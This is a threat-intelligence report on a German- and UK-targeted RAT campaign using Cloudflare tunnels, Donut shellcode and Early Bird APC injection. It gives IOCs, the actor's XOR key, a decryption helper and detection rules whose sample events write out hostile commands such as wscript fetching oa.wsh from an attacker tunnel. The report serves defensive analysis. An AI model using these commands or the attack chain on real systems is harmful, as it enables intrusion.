TLP : WHITE
Date : 2026-04-05
Analyst : GHOST (Breakglass Intelligence)
Classification : Cybercrime — Initial Access Broker / RAT Deployment
Related : Operation Nutten Tunnel, Operation Crest Snake, Operation Klein Changes
Executive Summary
Investigation of the charger-van-feb-circuit Cloudflare Quick Tunnel reveals the fourth documented tunnel rotation by a persistent threat actor targeting German and UK businesses with invoice-themed lures. The tunnel serves a WsgiDAV 4.3.3 open directory containing a complete attack chain: WSH entry point -> JScript WebDAV loader -> batch downloader -> XOR-encrypted Donut shellcode injected via Early Bird APC. This investigation also uncovered a previously undocumented staging tunnel (highland-trend-src-distinct) hosting the full payload archive dating back to November 2025, making this the oldest known artifact from this actor. The actor has 7 confirmed active tunnels as of April 5, 2026. None of the samples are present on VirusTotal, and there is no prior public reporting.
Critical OPSEC failures identified: the persistence script (pol.bat) references a directory from a previous tunnel (lg07) while the installer creates a different directory (vours), so the persistence mechanism silently fails. Additionally, the batch downloader references payload files (tv.bin, t.json) that were never uploaded to the tunnel.
Key Findings
7 LIVE Cloudflare Quick Tunnels confirmed active (charger-van, chubby-resident, highland-trend, klein-changes, crest-ind, wet-envelope, requires-fortune)
Same actor confirmed : Identical TTPs (WsgiDAV, oa.wsh/ccv.js chain, PurePythonObfuscator, KISS Loader, Early Bird APC injection)
New staging tunnel discovered : highland-trend-src-distinct hosts payload archive dating to November 28, 2025 (Sep01x86_Ayoo.zip)
Donut-packed shellcode : 71,938-byte XOR-encrypted payload containing Donut loader with embedded PE (MZ at offset 0x2495)
Persistence BROKEN : pol.bat references %LOCALAPPDATA%\lg07 but installer creates %LOCALAPPDATA%\vours — persistence silently fails
Missing payloads : neli.bat references tv.bin and t.json which return HTTP 404 — only ov.bin/a.json were deployed
German targeting : Lure document is IHK (German Chamber of Commerce) small business invoice template
Zero VT detections : Neither so.py nor vwo.zip appear in VirusTotal
Tactical evolution : Actor shifting from native DLL injection (Early Bird via jopfgl.dll/emand.dll loaded with regsvr32) to a Python-only chain (KISS Loader, which performs the same Early Bird APC injection from Python via ctypes)
What Was Found vs. What Was Known
Aspect | Prior Reporting (3 investigations) | Our Findings (this investigation)
Active tunnels | 5 (requires-fortune, crest-ind, klein-changes, wet-envelope, chubby-resident) | 7 (+charger-van, +highland-trend)
Oldest artifact | Jan 14, 2026 (klein-changes WSF) | Nov 28, 2025 (Sep01x86_Ayoo.zip on highland-trend)
WsgiDAV versions | 4.3.0, 4.3.3 | Confirmed mixed: 4.3.0 (highland-trend, chubby-resident), 4.3.3 (charger-van)
Payload type | Python RATs + Early Bird DLL | Donut-packed shellcode (new variant) via KISS Loader
Encryption | XOR with PurePythonObfuscator keys | Same (32-byte XOR, JSON key files, base64-encoded)
OPSEC failures | SID leak, LNK metadata | Broken persistence (wrong directory), missing payloads (tv.bin/t.json), reused scripts across tunnels
Execution variants | Python-only vs DLL+Python | 4 named variants: Winic (32-bit), DCMv, Callup, sharex (64-bit)
Attack Chain
[1] Victim receives link to tunnel
|
[2] oa.wsh (WebDAV) -> loads ccv.js from \\charger-van...@SSL\DavWWWRoot\
|
[3] ccv.js (JScript ActiveXObject) -> copies neli.bat to %TEMP%\r.bat, executes hidden
|
[4] neli.bat opens IHK invoice PDF lure (ihk.de)
|-- Downloads pol.bat to Startup (PERSISTENCE - BROKEN: references lg07, not vours)
|-- Downloads vwo.zip, extracts to %LOCALAPPDATA%\vours
|-- Downloads Python 3.10.0 embed to same directory
|
[5] so.py (KISS Loader) decrypts ov.bin using XOR key from a.json
|
[6] Donut shellcode (71,938 bytes) written into a freshly spawned, suspended explorer.exe and triggered via Early Bird APC (QueueUserAPC + ResumeThread)
|
[7] Donut decrypts embedded PE module and executes in-memory
Alternate Chain (via chubby-resident + highland-trend tunnels)
[1] UKA0X1.txt (downloader) fetches from highland-trend tunnel:
|-- 1Mar23MA.zip (16.7 MB) -> %USERPROFILE%\Contacts\MainRingtones (Python 3.12 x64 + payloads)
|-- 1Mar23ST.zip (16.7 MB) -> %USERPROFILE%\Contacts\str
|-- 1MaDLL.zip (357 KB) -> %APPDATA%\TokenSys (emand.dll - Early Bird DLL)
|-- 1Mar23SU.txt -> Startup persistence
|
[2] UKA0X2.txt (executor):
|-- Runs all .py files in MainRingtones\python312x64\
|-- Loads emand.dll via regsvr32 /s (DLL variant only)
|-- Kills Python parent processes via WMI
|-- Hides extracted folders with attrib +h
|-- Self-cleanup: deletes all .bat in Contacts, removes staging folders
Infrastructure Analysis
Tunnel Inventory (as of 2026-04-05)
Tunnel Name | WsgiDAV | Role | Status | First Seen | Investigation
charger-van-feb-circuit | 4.3.3 | Lure + payload delivery | LIVE | 2026-03-31 | This investigation
chubby-resident-airlines-converter | 4.3.0 | Batch script hosting (UK chain) | LIVE | 2026-04-01 | This investigation
highland-trend-src-distinct | 4.3.0 | Payload staging (zips, DLLs) | LIVE | 2025-11-28 | This investigation (NEW)
klein-changes-slim-starter | 4.3.0 | WSF dropper hosting | LIVE | 2026-01-14 | Op. Klein Changes
crest-ind-snake-dublin | 4.3.0 | Lure WSH hosting | LIVE | 2026-04-02 | Op. Crest Snake
wet-envelope-beam-laser | Unknown | Payload staging | LIVE | Unknown | Op. Crest Snake
requires-fortune-nutten-eligible | 4.3.3 | German lure campaign | LIVE | 2026-03-23 | Op. Nutten Tunnel
Highland-Trend Tunnel Contents (Payload Archive)
File | Size | Date | Purpose
Sep01x86_Ayoo.zip | 10.6 MB | 2025-11-28 | Oldest artifact: x86 payload from Sep/Nov 2025
1MaDLL.zip | 357 KB | 2026-03-30 | Early Bird APC injection DLL (emand.dll/jopfgl.dll)
1Mar23MA.zip | 16.7 MB | 2026-04-02 | Main payload: Python 3.12 x64 + RAT scripts
1Mar23ST.zip | 16.7 MB | 2026-04-02 | Backup/streaming payload
1Mar23SU.bat | 1.9 KB | 2025-12-15 | Old startup persistence (Dec 2025 version)
1Mar23SU.txt | 2.8 KB | 2026-03-27 | Current startup persistence (Mar 2026 version)
Chubby-Resident Tunnel Contents
File | Date | DLL Variant? | Description
UKA011.txt | 2026-04-01 | YES | Stage 1 downloader: downloads MA + ST + DLL zips
UKA012.txt | 2026-04-01 | YES | Stage 2 executor: runs Python + regsvr32 DLL + cleanup
UKA021.txt | 2026-04-02 | NO | Stage 1 downloader: Python-only (no DLL zip)
UKA022.txt | 2026-04-02 | NO | Stage 2 executor: Python-only (no regsvr32)
Disguise Directory Names
Folder Path | Disguised As
%USERPROFILE%\Contacts\MainRingtones | Ringtone files
%USERPROFILE%\Contacts\str | Generic
%APPDATA%\TokenSys | Token management system
%APPDATA%\Winic | Winic software
%USERPROFILE%\Videos\3DAus | 3D output files
%LOCALAPPDATA%\vours | Generic (charger-van)
%LOCALAPPDATA%\lg07 | Generic (previous tunnel)
Malware Analysis
Charger-Van Primary Payload
File: vwo.zip -> ov.bin + a.json + so.py
vwo.zip SHA256 : ab1ac7b16251a98bf0ca4a8df0c78de21b395ddd0a81aa273dd0fd40a3af7f03
so.py SHA256 : 5cab6bf65f7836371d5c27fbfc20fe10c0c4a11784990ed1a3d2585fa5431ba6
ov.bin SHA256 : 97b7c807c35e06f2fbc4723844b4dc99188de3c0e920d7b77fffce5f3d9a88db
a.json SHA256 : ff5a9c8bad4d0afa5fba68a08cf91dbda0619c06a143dcd0aeb5c2c5dccd0274
Decrypted shellcode SHA256 : 43caced9aa891ec593e4d3f09e9858c5d63ba4f23584e86b6673146e75181045
Encryption : XOR with 32-byte key from PurePythonObfuscator
XOR key (hex) : d38b4e224197e1758b2d7e9453e332db112bbfd1be51ef01f28d874ed2b90a48
Shellcode size : 71,938 bytes
Packer : Donut loader (call +0xBB88, pop rcx, structure-based API resolution)
Injection technique : Early Bird APC (T1055.004)
Target process : explorer.exe (default; spawned suspended by the loader)
Embedded PE : MZ header at offset 0x2495 within the Donut instance (encrypted at rest)
VT detections : not present on VirusTotal (never submitted)
Encryption Details
Key generator: PurePythonObfuscator v1.0
Entropy source: secrets+urandom+time+pid
Random seed: jNlLbmwnGkqiY2+XkmvHeQ==
XOR key (base64): 04tOIkGX4XWLLX6UU+My2xErv9G+Ue8B8o2HTtK5Ckg=
Integrity SHA256: a3437b0605513413d6803f832d416a691a92ed970b3f5a76b93693b33465bbcf
so.py (KISS Loader) Analysis
The loader is labeled "KISS Loader - Early Bird APC Injection for Lab Testing" and implements:
XOR decryption using key from JSON file
Early Bird APC injection via:
CreateProcessW (suspended, no window)
VirtualAllocEx (RWX)
WriteProcessMemory
QueueUserAPC
ResumeThread
Basic shellcode validation (checks first bytes for Meterpreter/x64/x86 patterns)
System info collection (OS, arch, username, computername)
Donut Shellcode Structure
Offset 0x0000: e8 88 bb 00 00 call +0xBB88 (jump to code)
Offset 0x0005: [48008 bytes] Donut instance (encrypted PE module)
- 0x0000: Instance length (0xBB88)
- 0x0004: DONUT_CRYPT block (Chaskey master key, 16 bytes, followed by the 16-byte counter; 32 bytes total)
- 0x0024: Maru hash IV (8 bytes, used for API hashing rather than for the cipher)
- 0x2495: Encrypted PE (MZ header visible only after Donut decrypts the instance)
Offset 0xBB8D: [23925 bytes] Donut loader code
- pop rcx (get instance pointer)
- API hash resolution
- VirtualAlloc (MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)
- Instance decryption
- PE loading and execution
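The decryption step in [5] and the layout just described can be checked mechanically: after a repeating-key XOR with the 32-byte key from the JSON key file, a correctly decrypted blob must start with e8 <rel32>, and because the instance's first dword is its own length, rel32 must equal that dword (the report's values are 0xBB88 both ways, putting the loader at 0xBB8D). The following is an added example written for this report, not the actor's so.py or Donut's own code. It assumes the key file stores the base64 key in a field named "key" (the report only states that the key is base64 in a JSON file), and it runs against a constructed toy blob with a 64-byte instance, encrypted with the key published above, rather than the real ov.bin.

```python
import base64
import json
import struct
from itertools import cycle
from typing import Optional

# XOR key published in the report (base64 form, as found in the a.json key file).
REPORT_KEY_B64 = "04tOIkGX4XWLLX6UU+My2xErv9G+Ue8B8o2HTtK5Ckg="


def load_key(key_json: str, field: str = "key") -> bytes:
    """Extract the base64 XOR key from an a.json-style file.
    The field name "key" is an assumption; the report only says the key is
    stored base64-encoded in a JSON file."""
    return base64.b64decode(json.loads(key_json)[field])


def xor_crypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Symmetric, so the same call encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def parse_donut_layout(blob: bytes) -> Optional[dict]:
    """Validate the Donut layout from the report: e8 <rel32> at offset 0 jumps
    over the instance to the loader, and the instance's first dword is its own
    length, so rel32 must equal that dword. Returns the layout, or None when the
    bytes do not fit (for example after decrypting with the wrong key)."""
    if len(blob) < 9 or blob[0] != 0xE8:
        return None
    rel32 = struct.unpack_from("<I", blob, 1)[0]
    inst_len = struct.unpack_from("<I", blob, 5)[0]
    loader_off = 5 + rel32
    if rel32 != inst_len or loader_off >= len(blob):
        return None
    return {
        "instance_offset": 5,
        "instance_len": inst_len,
        "loader_offset": loader_off,
        "loader_len": len(blob) - loader_off,
        # DONUT_CRYPT at instance+0x04 (master key + counter), Maru IV at instance+0x24
        "donut_crypt": blob[9:41].hex(),
        "maru_iv": blob[41:49].hex(),
    }


def recover(encrypted: bytes, key_json: str) -> Optional[dict]:
    """Decrypt an ov.bin-style blob and validate it as Donut shellcode."""
    return parse_donut_layout(xor_crypt(encrypted, load_key(key_json)))


# Constructed sample (not the real ov.bin): a toy Donut-shaped blob with a
# 64-byte instance and a 16-byte stand-in for the loader code.
def _build_toy_donut() -> bytes:
    inst_len = 64
    instance = struct.pack("<I", inst_len)           # instance length
    instance += bytes(range(32))                      # DONUT_CRYPT placeholder
    instance += b"\x11" * 8                           # Maru IV placeholder
    instance += b"\x00" * (inst_len - len(instance))  # rest of the instance
    loader = b"\x59" + b"\xcc" * 15                   # pop rcx, then filler
    return b"\xe8" + struct.pack("<I", inst_len) + instance + loader


SAMPLE_KEY_JSON = json.dumps({"key": REPORT_KEY_B64})
WRONG_KEY_JSON = json.dumps({"key": base64.b64encode(bytes(32)).decode()})
SAMPLE_PLAINTEXT = _build_toy_donut()
SAMPLE_ENCRYPTED = xor_crypt(SAMPLE_PLAINTEXT, load_key(SAMPLE_KEY_JSON))

if __name__ == "__main__":
    print(recover(SAMPLE_ENCRYPTED, SAMPLE_KEY_JSON))
    print(recover(SAMPLE_ENCRYPTED, WRONG_KEY_JSON))
```

The rel32-equals-length check is what makes the decryption self-verifying without needing to see the MZ header, which Donut keeps Chaskey-encrypted inside the instance. The same condition fits in a YARA rule as uint8(0) == 0xE8 and uint32(1) == uint32(5), which is useful for hunting decrypted Donut blobs in memory dumps.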
Dropper Chain Files
File | SHA256 | Purpose
oa.wsh | 94fe098ad878291c43bd3515da6dca27ead39377f524152d357bb004e0cdb723 | WebDAV script host launcher
ccv.js | ccb47e0a1f0e55a35ba1d554070d3524a45dfa5b86ca36cd5fb7d05dbdd144ca | JScript WebDAV copier + executor
neli.bat | c37ccf440732aa346ea7541b80a3799bff4437e052023bacde50cef1c89801c2 | Main batch downloader (opens lure, downloads payloads)
pol.bat | f84763ec289fc0389b0dd1b240bbaa8a231b54ad0decc1b66b0eb07e5c7a70e2 | Startup persistence (BROKEN: wrong directory)
desktop.ini | 8301e344371b0753d547b429c5fe513908b1c9813144f08549563ac7f4d7da68 | Windows folder descriptor (UTF-16)
Highland-Trend DLL Payload
1MaDLL.zip SHA256 : 314c2cb202e4cea8d63051325abe326dfb75ae2995e843f6e8eea247290f59a1
Contents : emand.dll (Early Bird APC injection DLL)
Loading : regsvr32 /s (silent COM registration)
Previously documented : jopfgl.dll in Op. Klein Changes (GCC 15.1.0 compiled)
Threat Actor Profile
Attribution Assessment
Confidence : HIGH (cross-investigation consistency)
SID : S-1-5-21-3343087317-1842942590-547433828-500 (Administrator, confirmed across all campaigns)
Country/Region : Likely German-speaking or targeting German speakers
Motivation : Financial (Initial Access Broker / RAT deployment)
Sophistication : MODERATE (custom tooling, multi-tunnel architecture, but frequent OPSEC failures)
OPSEC Failures (This Investigation)
Broken persistence : pol.bat references %LOCALAPPDATA%\lg07 (from previous tunnel), but neli.bat creates %LOCALAPPDATA%\vours. Persistence will silently fail on reboot.
Missing payloads : neli.bat attempts to decrypt tv.bin with t.json, but neither file exists on the tunnel (HTTP 404). Only ov.bin/a.json were deployed.
Reused scripts : pol.bat is a direct copy from a previous tunnel without updating the directory path.
Left old artifacts online : highland-trend tunnel still hosts Sep01x86_Ayoo.zip from November 2025 and 1Mar23SU.bat from December 2025.
All tunnels remain active : Despite being investigated 3 times, all 7 tunnels are still live and accessible.
Anonymous read-write access : All WsgiDAV instances allow unauthenticated read-write access.
Actor Timeline
Date | Event | Tunnel | Evidence
2025-11-28 | Sep01x86_Ayoo.zip uploaded | highland-trend | File timestamp
2025-12-15 | 1Mar23SU.bat (old startup) created | highland-trend | File timestamp
2026-01-14 | First WSF dropper | klein-changes | Investigation
2026-03-23 | German lure campaign | requires-fortune | Investigation
2026-03-27 | Startup persistence updated (.txt variant) | highland-trend | File timestamp
2026-03-30 | 1MaDLL.zip (Early Bird DLL) uploaded | highland-trend | File timestamp
2026-03-31 | desktop.ini placed | charger-van | File timestamp
2026-04-01 | UKA011/012 (DLL variant) deployed | chubby-resident | File timestamp
2026-04-02 | UKA021/022 (Python-only variant) deployed | chubby-resident | File timestamp
2026-04-02 | Main payload zips updated | highland-trend | File timestamp
2026-04-02 | Lure hosting active | crest-ind | Investigation
2026-04-03 | ccv.js, neli.bat, oa.wsh uploaded | charger-van | File timestamp
2026-04-05 | ALL 7 tunnels confirmed LIVE | All | This investigation
Tactical Evolution
The actor demonstrates clear evolution across the investigation timeline:
Sep-Nov 2025 : x86-only payloads (Sep01x86_Ayoo.zip)
Dec 2025 : Added 32-bit/64-bit dual architecture (1Mar23SU.bat)
Jan-Mar 2026 : WSF dropper chain, multiple RAT variants
Late Mar 2026 : Added native DLL injection (1MaDLL.zip/emand.dll via regsvr32)
Apr 1, 2026 : DLL + Python dual-payload chain (UKA011/012)
Apr 2, 2026 : Removed DLL, Python-only chain (UKA021/022) — possible detection avoidance
Apr 3, 2026 : New tunnel (charger-van) with Donut-packed shellcode via KISS Loader — significant capability upgrade
The shift from Python RAT scripts to Donut-packed shellcode with Early Bird APC injection represents a notable escalation in sophistication.
MITRE ATT&CK Mapping
Tactic | Technique | ID | Application
Initial Access | Phishing: Spearphishing Link | T1566.002 | Link to WsgiDAV tunnel
Execution | User Execution: Malicious File | T1204.002 | oa.wsh -> ccv.js chain
Execution | Command and Scripting Interpreter: JavaScript | T1059.007 | ccv.js ActiveXObject
Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 | neli.bat, pol.bat
Execution | Command and Scripting Interpreter: Python | T1059.006 | so.py KISS Loader, RAT scripts
Persistence | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1547.001 | pol.bat in Startup folder
Defense Evasion | Process Injection: Asynchronous Procedure Call | T1055.004 | Early Bird: QueueUserAPC into suspended explorer.exe
Defense Evasion | Obfuscated Files or Information: Encrypted/Encoded File | T1027.013 | XOR-encrypted .bin payloads
Defense Evasion | Deobfuscate/Decode Files or Information | T1140 | XOR decryption at runtime
Defense Evasion | Masquerading: Match Legitimate Name or Location | T1036.005 | Folders named MainRingtones, TokenSys, Winic
Defense Evasion | Hide Artifacts: Hidden Files and Directories | T1564.001 | attrib +h on payload directories
Defense Evasion | System Binary Proxy Execution: Regsvr32 | T1218.010 | regsvr32 /s emand.dll (this is the correct mapping for the DLL load; it is not Service Execution)
Command and Control | Ingress Tool Transfer | T1105 | Payload retrieval from the WsgiDAV tunnels over HTTPS and WebDAV UNC paths (T1021.002 does not apply: this is download from attacker infrastructure, not lateral movement)
IOC Summary
Network Indicators
charger-van-feb-circuit[.]trycloudflare[.]com — WsgiDAV 4.3.3 — Lure + payload delivery — LIVE
chubby-resident-airlines-converter[.]trycloudflare[.]com — WsgiDAV 4.3.0 — Batch hosting — LIVE
highland-trend-src-distinct[.]trycloudflare[.]com — WsgiDAV 4.3.0 — Payload staging — LIVE
klein-changes-slim-starter[.]trycloudflare[.]com — WSF dropper hosting — LIVE
crest-ind-snake-dublin[.]trycloudflare[.]com — Lure WSH hosting — LIVE
wet-envelope-beam-laser[.]trycloudflare[.]com — Payload staging — LIVE
requires-fortune-nutten-eligible[.]trycloudflare[.]com — German lure campaign — LIVE
hxxps://www[.]ihk[.]de/blueprint/servlet/resource/blob/5581278/1cafa7f203df9d83e050d9f01677ffe6/rechnung-kleinunternehmer-data[.]pdf — Lure document (legitimate IHK invoice template)
File Indicators
SHA256 | Filename | Type
ab1ac7b16251a98bf0ca4a8df0c78de21b395ddd0a81aa273dd0fd40a3af7f03 | vwo.zip | Payload archive
5cab6bf65f7836371d5c27fbfc20fe10c0c4a11784990ed1a3d2585fa5431ba6 | so.py | KISS Loader (Early Bird APC)
97b7c807c35e06f2fbc4723844b4dc99188de3c0e920d7b77fffce5f3d9a88db | ov.bin | XOR-encrypted Donut shellcode
ff5a9c8bad4d0afa5fba68a08cf91dbda0619c06a143dcd0aeb5c2c5dccd0274 | a.json | PurePythonObfuscator XOR key
43caced9aa891ec593e4d3f09e9858c5d63ba4f23584e86b6673146e75181045 | ov_decrypted.bin | Decrypted Donut shellcode
ccb47e0a1f0e55a35ba1d554070d3524a45dfa5b86ca36cd5fb7d05dbdd144ca | ccv.js | JScript WebDAV copier
c37ccf440732aa346ea7541b80a3799bff4437e052023bacde50cef1c89801c2 | neli.bat | Main downloader batch
94fe098ad878291c43bd3515da6dca27ead39377f524152d357bb004e0cdb723 | oa.wsh | WSH entry point
f84763ec289fc0389b0dd1b240bbaa8a231b54ad0decc1b66b0eb07e5c7a70e2 | pol.bat | Persistence (broken)
314c2cb202e4cea8d63051325abe326dfb75ae2995e843f6e8eea247290f59a1 | 1MaDLL.zip | Early Bird DLL archive
Behavioral Indicators
Startup persistence : Random-named .bat in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
Working directories : %LOCALAPPDATA%\vours, %LOCALAPPDATA%\lg07, %USERPROFILE%\Contacts\MainRingtones, %APPDATA%\TokenSys, %APPDATA%\Winic
Python embed download : hxxps://www[.]python[.]org/ftp/python/3.10.0/python-3.10.0-embed-amd64.zip
Hidden folders : attrib +h applied to payload directories
VBS helpers : rhn.vbs, rhnE.vbs, DiscordDial.vbs, py_parent.vbs in %USERPROFILE%\Contacts\
Process pattern : explorer.exe with python.exe as its parent (the KISS Loader creates explorer.exe suspended for APC injection); in the UKA0X2 chain the Python parent processes are then killed via WMI after payload execution
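The behavioural indicators above translate directly into process-creation rules. The following is an added example for this report, not a detection shipped by any vendor or by the report's author: it runs six rules over constructed Sysmon-style process-creation events (field names Image, ParentImage and CommandLine are assumed, and the user name, paths and command lines are made up to match the chains described above, not captured telemetry). A benign python.exe launch from a standard install directory is included to show that the python rule keys on the path, not the binary name.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Working directories listed in the report; the lookahead accepts a path
# separator, whitespace, a quote or end-of-string after the directory name.
SUSPECT_DIR_RE = re.compile(
    r"\\(?:Contacts\\(?:MainRingtones|str)|Videos\\3DAus"
    r"|AppData\\Roaming\\(?:TokenSys|Winic)|AppData\\Local\\(?:vours|lg07))"
    r"(?=[\\\s\"]|$)", re.IGNORECASE)
# python.exe running from anywhere under a user's Contacts, Videos or AppData tree.
NONSTD_PYTHON_RE = re.compile(
    r"\\Users\\[^\\]+\\(?:Contacts|Videos|AppData)\\.*\\python\.exe$", re.IGNORECASE)
# UNC WebDAV path to a Quick Tunnel, as used by oa.wsh / ccv.js.
WEBDAV_TUNNEL_RE = re.compile(
    r"\\\\[a-z0-9-]+\.trycloudflare\.com@SSL\\DavWWWRoot\\", re.IGNORECASE)
TEMP_RBAT_RE = re.compile(r"\\Temp\\r\.bat\b", re.IGNORECASE)
SILENT_FLAG_RE = re.compile(r"(?:^|\s)/s(?:\s|$)", re.IGNORECASE)


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage_events(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event_index, rule_name) for every event that matches a
    behavioural indicator from the report. One event may match several rules."""
    findings: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        image = ev.get("Image", "")
        cmd = ev.get("CommandLine", "")
        img, par = _base(image), _base(ev.get("ParentImage", ""))
        if img in ("wscript.exe", "cscript.exe") and WEBDAV_TUNNEL_RE.search(cmd):
            findings.append((i, "script_host_from_tunnel_webdav"))
        if img == "cmd.exe" and TEMP_RBAT_RE.search(cmd):
            findings.append((i, "temp_rbat_execution"))
        if img == "python.exe" and NONSTD_PYTHON_RE.search(image):
            findings.append((i, "python_nonstandard_path"))
        if img == "explorer.exe" and par == "python.exe":
            findings.append((i, "explorer_spawned_by_python"))
        if img == "regsvr32.exe" and SILENT_FLAG_RE.search(cmd) and SUSPECT_DIR_RE.search(cmd):
            findings.append((i, "regsvr32_silent_load_from_suspect_dir"))
        if img == "attrib.exe" and "+h" in cmd.lower() and SUSPECT_DIR_RE.search(cmd):
            findings.append((i, "attrib_hide_suspect_dir"))
    return findings


# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS: List[Event] = [
    {"Image": r"C:\Program Files\Python312\python.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Python312\python.exe" build.py'},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "\\charger-van-feb-circuit.trycloudflare.com@SSL\DavWWWRoot\oa.wsh"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\r.bat"'},
    {"Image": r"C:\Users\alice\AppData\Local\vours\python.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"python.exe so.py"},
    {"Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\vours\python.exe",
     "CommandLine": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"regsvr32 /s C:\Users\alice\AppData\Roaming\TokenSys\emand.dll"},
    {"Image": r"C:\Windows\System32\attrib.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"attrib +h C:\Users\alice\Contacts\MainRingtones"},
]

if __name__ == "__main__":
    for idx, rule in triage_events(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} -> {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The explorer-spawned-by-python rule is the one that survives tunnel rotation and directory renames, since the Early Bird technique requires the loader to create its own target process; the path-based rules should be refreshed whenever a new working directory is observed.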
Recommended Actions
Block all 7 tunnel domains at DNS/proxy level; because the actor rotates Quick Tunnel names, also alert on any *.trycloudflare.com resolution from hosts with no business need to reach it
Search for so.py, ov.bin, a.json file names in %LOCALAPPDATA% and %USERPROFILE%\Contacts
Check Startup folder for random-named .bat files containing so.py or python references
Look for python.exe running from non-standard paths (Contacts, Videos, AppData)
Short-term (1-2 weeks)
Submit IOCs to MalwareBazaar, ThreatFox, URLhaus
Report all 7 tunnels to Cloudflare abuse (abuse@cloudflare.com)
Hunt for additional tunnel rotations (actor creates new tunnels frequently)
Deploy YARA rules for KISS Loader and PurePythonObfuscator key files
Medium-term (1-3 months)
Monitor for new WsgiDAV instances behind trycloudflare.com. Quick Tunnel hostnames are served under Cloudflare's shared wildcard certificate for trycloudflare.com, so individual tunnel names do not surface in CT logs; DNS and proxy logs of *.trycloudflare.com lookups are the practical source, with candidates then fingerprinted by their WsgiDAV server banner
Track PurePythonObfuscator tooling for new variants
Cross-reference Donut shellcode hashes with sandbox submissions